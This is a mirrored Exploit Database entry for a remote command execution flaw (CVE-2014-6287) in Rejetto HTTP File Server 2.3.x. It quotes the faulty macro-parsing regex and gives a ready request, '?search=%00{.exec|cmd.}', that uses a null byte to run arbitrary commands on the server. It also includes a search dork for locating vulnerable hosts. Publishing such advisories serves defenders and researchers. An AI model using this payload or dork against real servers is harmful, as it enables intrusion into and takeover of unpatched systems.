Rejetto HTTP File Server (HFS) 2.3.x – Remote Command Execution (1)

• Exploit Database
• 104 阅读

• 作者： Daniele Linguaglossa
  日期： 2014-09-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34668/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  # Exploit Title: HttpFileServer 2.3.x Remote Command Execution # Google Dork: intext:"httpfileserver 2.3" # Date: 11-09-2014 # Remote: Yes # Exploit Author: Daniele Linguaglossa # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287   issue exists due to a poor regex in the file ParserLib.pas     function findMacroMarker(s:string; ofs:integer=1):integer; begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;     it will not handle null byte so a request to   http://localhost:80/?search=%00{.exec|cmd.}   will stop regex from parse macro , and macro will be executed and remote code injection happen.     ## EDB Note: This vulnerability will run the payload multiple times simultaneously. ## Make sure to take this into consideration when crafting your payload (and/or listener).